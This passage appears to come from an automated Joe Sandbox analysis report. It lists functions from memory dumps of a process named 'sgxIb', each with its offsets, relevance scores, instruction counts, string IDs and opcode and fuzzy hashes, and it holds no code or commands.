                                        • Opcode ID: a2a969f3dabca2d2bcd73eff19d293277ee834f20c6e19eb9d37a2d7f2e7eb99
                                        • Instruction ID: 7a4d570d4245304ca11c293e750313f6e22923ed02a9ef23a8669fef4df1b227
                                        • Opcode Fuzzy Hash: a2a969f3dabca2d2bcd73eff19d293277ee834f20c6e19eb9d37a2d7f2e7eb99
                                        • Instruction Fuzzy Hash: CE419F71E0030A9FDB65DF65C89469EBBB2FF85280F144929D405EB240DB75E946CB81
                                        Function 06F121BD Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 7c80778be5f3a02835f01f24628a0e025cfd5e4a910371de24641b9c3f267c19
                                        • Instruction ID: 5d8d65263541c2372f91bd1d07ac9d1cad45fde7473cca551fba83354bb577a4
                                        • Opcode Fuzzy Hash: 7c80778be5f3a02835f01f24628a0e025cfd5e4a910371de24641b9c3f267c19
                                        • Instruction Fuzzy Hash: E641E230F042419FDB559BB4C52866E7BE2EF89290F144568D406DF395DF35CE82CBA1
                                        Function 06F02661 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 2ad898565ce31f03c7dfa0f4a95ee183661cc63c5f02626cdfff9fb8f2602a67
                                        • Instruction ID: 881fe608e36b2d485c934070f4cf3f86726c335275d1a002a7b0a6bc989c71f0
                                        • Opcode Fuzzy Hash: 2ad898565ce31f03c7dfa0f4a95ee183661cc63c5f02626cdfff9fb8f2602a67
                                        • Instruction Fuzzy Hash: 7B311231F002058FEB55AB74D95826EBBE2EBC9214F208868D406DB394DF35DE46DBA1
                                        Function 06F1DBF1 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 6f95350b47ccc526d5293b29769673f95e0d52b460a88d69cb4c2733d4897177
                                        • Instruction ID: 839d1f4422aa295fa643966229625a06073289b937e573578c9bcc50770dc8d7
                                        • Opcode Fuzzy Hash: 6f95350b47ccc526d5293b29769673f95e0d52b460a88d69cb4c2733d4897177
                                        • Instruction Fuzzy Hash: 7141C030E0060A9FDF65DFA5C49469EFBB2FF85340F144929E805EB240DBB0E946CB81
                                        Function 06F121D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: cbb9adc8dd409311aa887dc3832c66543e6533712919f48ec238353c5e2c59d1
                                        • Instruction ID: 3859850efd6f4a977af29a847576cc880aa6ff9c9b72c41abff3e1b6e18efdfd
                                        • Opcode Fuzzy Hash: cbb9adc8dd409311aa887dc3832c66543e6533712919f48ec238353c5e2c59d1
                                        • Instruction Fuzzy Hash: B131D230F002018FDB599BB4D52866E7BE2AB89250F148828D406DF394DF35DE86CBA1
                                        Function 06F183E8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: fd33d1a95cd2e4a4d97e52189febba42ac546be74c417c89e3aadd45d800d8ef
                                        • Instruction ID: 5280b2bba85ed6463c1935a364754b8358512e37c27f4b29624ee69756dad13c
                                        • Opcode Fuzzy Hash: fd33d1a95cd2e4a4d97e52189febba42ac546be74c417c89e3aadd45d800d8ef
                                        • Instruction Fuzzy Hash: C6F08C36F00215DFEFA48A59FB802A877ADFB802D0F144466D914CF265CF76D946CB91
                                        Function 06F14B69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Ocq
                                        • API String ID: 0-2995510325
                                        • Opcode ID: ee5d839b8195d7f7a9fb87b348d52a95afe505d6640d7f44346ffa64351d35ff
                                        • Instruction ID: 936bfcc6595c56835d779193148c6c52d3806a9ba4e6c5707f8f5b5d649835ff
                                        • Opcode Fuzzy Hash: ee5d839b8195d7f7a9fb87b348d52a95afe505d6640d7f44346ffa64351d35ff
                                        • Instruction Fuzzy Hash: 65F0B730E10129DFDB14DF94E9697AEBBF2FF88744F204519E402AB294CB741D01CB80
                                        Function 06F1B3E7 Relevance: .6, Instructions: 560COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9656151070d9f8a10a8ee6f40534208097d3a7d59d804788cf65045cc119e91
                                        • Instruction ID: 7258ca97dbe0374c21ee414e77a57186f2ed907d4d08df0c7e3d47cea4bf2e0e
                                        • Opcode Fuzzy Hash: c9656151070d9f8a10a8ee6f40534208097d3a7d59d804788cf65045cc119e91
                                        • Instruction Fuzzy Hash: 53224B30E10209CFEF64CB68D5947ADB7B6EB85350F248866E409EF395DA35DC828B51
                                        Function 06F16E30 Relevance: .3, Instructions: 257COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 359a2463cceba3bac208226dcf80fcea7e98f17a30328821d9c60becd013b35a
                                        • Instruction ID: 7f6d7558be7e1dd76ec946a800b6b8c6f7edba91d2dc907897abfe84f9130472
                                        • Opcode Fuzzy Hash: 359a2463cceba3bac208226dcf80fcea7e98f17a30328821d9c60becd013b35a
                                        • Instruction Fuzzy Hash: ACA16930A00205CFCB64EB68D594A5EB7F2FB84394F548569E81AAF361DB35ED85CB80
                                        Function 06F156B0 Relevance: .3, Instructions: 256COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f7d0fc298063f6db418808ff135ff655543216489cc0195f010826aff9a8d8d
                                        • Instruction ID: be301f5998be325667f96cb8998a951e2c9b73b18c77e13810b6d5a273e9df60
                                        • Opcode Fuzzy Hash: 3f7d0fc298063f6db418808ff135ff655543216489cc0195f010826aff9a8d8d
                                        • Instruction Fuzzy Hash: 3191D1F1E142198FDF708A69C49036EBBA2EBC5370F14897AD4ADDF285C635D841CB91
                                        Function 06F16308 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6b60354ee378dc1e79c387431a552fccab51b3ff4c74655c8920be0437702c9
                                        • Instruction ID: 38751b0198c500d944b2512847fa611173e455fc6917b2a20ac0563d8c6432ba
                                        • Opcode Fuzzy Hash: c6b60354ee378dc1e79c387431a552fccab51b3ff4c74655c8920be0437702c9
                                        • Instruction Fuzzy Hash: 8561C071F001214FDB559A7EC88466FBAD7AFC4620B25443AD80EDB364DE66ED0387D2
                                        Function 06F143C7 Relevance: .2, Instructions: 219COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 570e334142b3b75210fa2c87f28bc3859a9142572aec55d2b876036a4846cbf2
                                        • Instruction ID: f9e49bf422641bb1d8623170980e8ab62cc1db6553d0873e97cc21913cb89afc
                                        • Opcode Fuzzy Hash: 570e334142b3b75210fa2c87f28bc3859a9142572aec55d2b876036a4846cbf2
                                        • Instruction Fuzzy Hash: 4D812B70F0020A9FDF44DFA9D55466EB7F6ABC9344F108529D40ADB394EB35EC828B91
                                        Function 06F146D4 Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 154d787c202e0427614a686970003b46fee1fffc36e754333714409630185321
                                        • Instruction ID: 636e2e57ac038500736cedd547ac684a0aa851e5fe81ff591c6aba7cab0d3b81
                                        • Opcode Fuzzy Hash: 154d787c202e0427614a686970003b46fee1fffc36e754333714409630185321
                                        • Instruction Fuzzy Hash: 6F914D34E1021A8FDF60DF68C890B9DB7B1FF89310F208599D549AB255EB70AA85CF91
                                        Function 06F146E8 Relevance: .2, Instructions: 210COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e3f5388f3c56cf9060c8c73a4ba8f0f89eeea05467f8ab0334631bc4c347cc7
                                        • Instruction ID: bb263bbe40ddfa8ca81ef0080ca54553be5d53b15555c1ce08aa8aa85d1c07cd
                                        • Opcode Fuzzy Hash: 9e3f5388f3c56cf9060c8c73a4ba8f0f89eeea05467f8ab0334631bc4c347cc7
                                        • Instruction Fuzzy Hash: 9E915D34E1021A8BDF60DF68C890B9DB7B1FF89310F208599D549BB355EB70AA85CF91
                                        Function 06F01209 Relevance: .2, Instructions: 206COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b42957f9f83fa62070ce1c34bb7394b2447852b25c7bf5e49c929be9450fd20b
                                        • Instruction ID: caae8d3ec039b4a35da6c1cd334d6671544fe962829fdc2fa90a44a2b354f3b0
                                        • Opcode Fuzzy Hash: b42957f9f83fa62070ce1c34bb7394b2447852b25c7bf5e49c929be9450fd20b
                                        • Instruction Fuzzy Hash: B1819C30E002199FEF65DBA4C890BAEBBB6FB85310F104969D509EB2D0CB34DD45DB92
                                        Function 06F1F048 Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b23d7a11f7abaf261a48268803643aea5068f03dd691ddc8af871f9b3c86f2f
                                        • Instruction ID: 53bcda0690352e1a14bfda7066c5d637741c53360566f998a20ed9e5ed4619ee
                                        • Opcode Fuzzy Hash: 8b23d7a11f7abaf261a48268803643aea5068f03dd691ddc8af871f9b3c86f2f
                                        • Instruction Fuzzy Hash: 07714874A012499FDB44DFA9D990A9EBBF6FF88350F248429D409EB364DB30EC46CB50
                                        Function 06F1F041 Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ccc58eb60c972c579c6686f0e8e4d4b0d13ba7478f3126d206cbbed46fd7f8b
                                        • Instruction ID: 35d3ff4b25f43303c972758d531c59fdbe1b38d5fe2a89e665796b4401a606e3
                                        • Opcode Fuzzy Hash: 5ccc58eb60c972c579c6686f0e8e4d4b0d13ba7478f3126d206cbbed46fd7f8b
                                        • Instruction Fuzzy Hash: BE714774E012099FDB44DBA9D990A9EBBF6FF88310F248529D419EB364DB30ED46CB40
                                        Function 06F01500 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f90757595b84d4fcf8d10efcad1c79f794cef0db093891dc9fbeea84cdb8274a
                                        • Instruction ID: 94b83d5ef8b3ff8b4d8460a13f38c5beac59a351a163185c8f6458499ad02e38
                                        • Opcode Fuzzy Hash: f90757595b84d4fcf8d10efcad1c79f794cef0db093891dc9fbeea84cdb8274a
                                        • Instruction Fuzzy Hash: 55519F75E002159FDBA0DFA9C8807AEBBF5FB89320F148529D81AEB390C734D941CB90
                                        Function 06F1FA78 Relevance: .2, Instructions: 173COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ea0d5193ceb8370450deeba237ef9afc2032e8d9e04a96bdd93b2aad2380816
                                        • Instruction ID: 61b822d57d701770c73f4da8aeed07cbf5d78bc8d1536ae93b443a3a3e12eeef
                                        • Opcode Fuzzy Hash: 5ea0d5193ceb8370450deeba237ef9afc2032e8d9e04a96bdd93b2aad2380816
                                        • Instruction Fuzzy Hash: 4551E770F212059FEF64A67CD95473F269ED7C9360F20482AE40ADB395C96DCC8687E2
                                        Function 06F02831 Relevance: .2, Instructions: 172COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3b228cc172dbb8a4c917cd5ef9557b1b2ba58a35d481dd9613ce92b790851d4
                                        • Instruction ID: 5fe3338e48b036dce35be51efe0c4b0a8bfc2405610552d7f009dd2ba5968263
                                        • Opcode Fuzzy Hash: f3b228cc172dbb8a4c917cd5ef9557b1b2ba58a35d481dd9613ce92b790851d4
                                        • Instruction Fuzzy Hash: 6251AE74B103058FDB55EF75D9906AEBBE3FFC8200B208529D406A7394DF34AD8A9B91
                                        Function 06F1FCD5 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8db3e9b7908bdfe3a5ceb544f2afe00591b80aba5489c8f47625d008f3196b9
                                        • Instruction ID: 65226428e760865bb07e90e98446c16f90f1f3315fdaa34567b9923264d54e68
                                        • Opcode Fuzzy Hash: e8db3e9b7908bdfe3a5ceb544f2afe00591b80aba5489c8f47625d008f3196b9
                                        • Instruction Fuzzy Hash: A2510231E02105CFCF64AB78E4542ADBBF2FB84364F108879E11ADB251DB358A45CB81
                                        Function 06F1FA88 Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb54b1820cd1253e39383b9764659195807c6290cde99c61151684fe2754172c
                                        • Instruction ID: fe69e9485010cf574f625dafcfaec3255e4e77613795c5cc0a5e76405aeff50a
                                        • Opcode Fuzzy Hash: fb54b1820cd1253e39383b9764659195807c6290cde99c61151684fe2754172c
                                        • Instruction Fuzzy Hash: 4251F870F212059FEF64A66CD95472F269ED7C9360F204829E40ADB3D4C96DCC8647D2
                                        Function 06F1C908 Relevance: .2, Instructions: 160COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ede54da0c85d0085f187c45cc5b3a2ef14c5f9790779e1c6f9861cc7afd867f3
                                        • Instruction ID: 3f35db6390b5caebf79278bb398fbd4d7f148dc8a7f3184f623eeaae94f12cb8
                                        • Opcode Fuzzy Hash: ede54da0c85d0085f187c45cc5b3a2ef14c5f9790779e1c6f9861cc7afd867f3
                                        • Instruction Fuzzy Hash: 12517E35B112188FCB45EB79E990A9EBBF2FB88354B108569D405EF354DB35EC86CB80
                                        Function 06F0244D Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb4e5acac0bef263eae7e4859bff8571b7766fd729d94412883c075f43630f6f
                                        • Instruction ID: bb5c9f95c06c54a6680b43e842d1f13f01da05624c7332898eaed898636a263a
                                        • Opcode Fuzzy Hash: bb4e5acac0bef263eae7e4859bff8571b7766fd729d94412883c075f43630f6f
                                        • Instruction Fuzzy Hash: 26519E30E0020A9FEB54DFA4C59865EB7F2FF85304F248529D80A9B395DB70ED86CB91
                                        Function 06F02450 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 949cd6dfef41f9016ac4a1fa642af1733d1e7fef236f133995c70ee94a3a74a2
                                        • Instruction ID: a5d22a91dcb12f289cd965fae2a32ed704a492c03c7f372680bb988c476cb8b8
                                        • Opcode Fuzzy Hash: 949cd6dfef41f9016ac4a1fa642af1733d1e7fef236f133995c70ee94a3a74a2
                                        • Instruction Fuzzy Hash: D3519D30E0020A9FEB54DFA4C59865EB7F2FF85304F248529D80A9B395DB70ED86CB91
                                        Function 06F15537 Relevance: .1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6823766b593efc2aabacfc17b9cf25f4275ee5bbd5fe93fbcf79356329c00733
                                        • Instruction ID: 2e052e0d8e388622e9a7f3f2e863cff5621080b8646fda1c91abcdeb2ed0dcdb
                                        • Opcode Fuzzy Hash: 6823766b593efc2aabacfc17b9cf25f4275ee5bbd5fe93fbcf79356329c00733
                                        • Instruction Fuzzy Hash: D2414DB1E006098FDF70CEAAD880AAFFBB2FB85354F10492AD156DB644D731E8458B90
                                        Function 06F00FFD Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f5b82897da06171e55b2dd23c13f76da403ef20b12d511d018289be18c5ba7a
                                        • Instruction ID: e1446840cfb550a76d7274f3ce59712111549a23113734c586ec5ce09f23f66d
                                        • Opcode Fuzzy Hash: 2f5b82897da06171e55b2dd23c13f76da403ef20b12d511d018289be18c5ba7a
                                        • Instruction Fuzzy Hash: FE318331B001055BEB54ABA98D90B9FBAE6FBC8720F208529E159EB3C4CA719C119790
                                        Function 06F01000 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8db51dc2c942754382a66294d173d96481923b8a77656e68b5e9b6c507276792
                                        • Instruction ID: cdc2b8347a413d03114ad3fa89ffcbdf8cedb1645f99b8aaced48d468114e59d
                                        • Opcode Fuzzy Hash: 8db51dc2c942754382a66294d173d96481923b8a77656e68b5e9b6c507276792
                                        • Instruction Fuzzy Hash: F7319431F001055FEB54AFADC990B9FBAE6FBC8720F208529E159EB3C4CA719C119790
                                        Function 06F12080 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64f5a3c04839911a4991098c7a663a8df8cba9bd92b8e2713ff6fd1eaa4700a2
                                        • Instruction ID: 78243b0899b721e3e2e565df05eb90890465abab4fa6ec532ab950ccc8cd4ae9
                                        • Opcode Fuzzy Hash: 64f5a3c04839911a4991098c7a663a8df8cba9bd92b8e2713ff6fd1eaa4700a2
                                        • Instruction Fuzzy Hash: 07318431E0060A9FCB55DFA5D85469EB7B2FF89350F108519E90AEB350DB71ED82CB50
                                        Function 06F1DAA1 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bf0b20f4f8b89da83d5b0bccc105fda33af4c902ad05e204c70cde770c86291
                                        • Instruction ID: f19ab23f48a1dbe44cfe6e3792eb9934b2a583c8529e04746ce95ea74c1deef4
                                        • Opcode Fuzzy Hash: 5bf0b20f4f8b89da83d5b0bccc105fda33af4c902ad05e204c70cde770c86291
                                        • Instruction Fuzzy Hash: 0931A230E1020A9FCF65DF69D89069EBBF2FF85354F104929E405EB354EB70E9868B80
                                        Function 06F02AA0 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abd506c9ea2faf5557e46e61abaadc1c65a6b7dcbbe48d8849663b5d1d7b6fec
                                        • Instruction ID: 7955a263de6d2f95f5b8e26f288d78cbdb3673553e6b88566aad693957b8d216
                                        • Opcode Fuzzy Hash: abd506c9ea2faf5557e46e61abaadc1c65a6b7dcbbe48d8849663b5d1d7b6fec
                                        • Instruction Fuzzy Hash: 6F415D74B002098FDB54DF69C598A9ABBF1FF88310F144469E4029B3B4DB75ED85DB60
                                        Function 06F13508 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed57a9ec80ffd0777092292da222229cb1416594c063407e2dd416dbe341a6f2
                                        • Instruction ID: 6891ba7015cc9a31a66bb0629a158bb101a6976fae593d70057ec31db71cd450
                                        • Opcode Fuzzy Hash: ed57a9ec80ffd0777092292da222229cb1416594c063407e2dd416dbe341a6f2
                                        • Instruction Fuzzy Hash: 98315572D003254FC710ABBD8C008CEBBA1AF85734F1447AAC165EF2E4D9319942CBE1
                                        Function 06F12090 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04273cacbba38627d82c0664cd8d9ebc4368581928dadf68b6a5b36c774f5b33
                                        • Instruction ID: 71e269e3b65e69a9ac409311adca697494dbb84ab4831e32b6108efa31982105
                                        • Opcode Fuzzy Hash: 04273cacbba38627d82c0664cd8d9ebc4368581928dadf68b6a5b36c774f5b33
                                        • Instruction Fuzzy Hash: 7D313E31E1060A9FCB55DFA5D85469EB7B2FF89300F108529E90AEB350EB71ED86CB50
                                        Function 06F13FD0 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
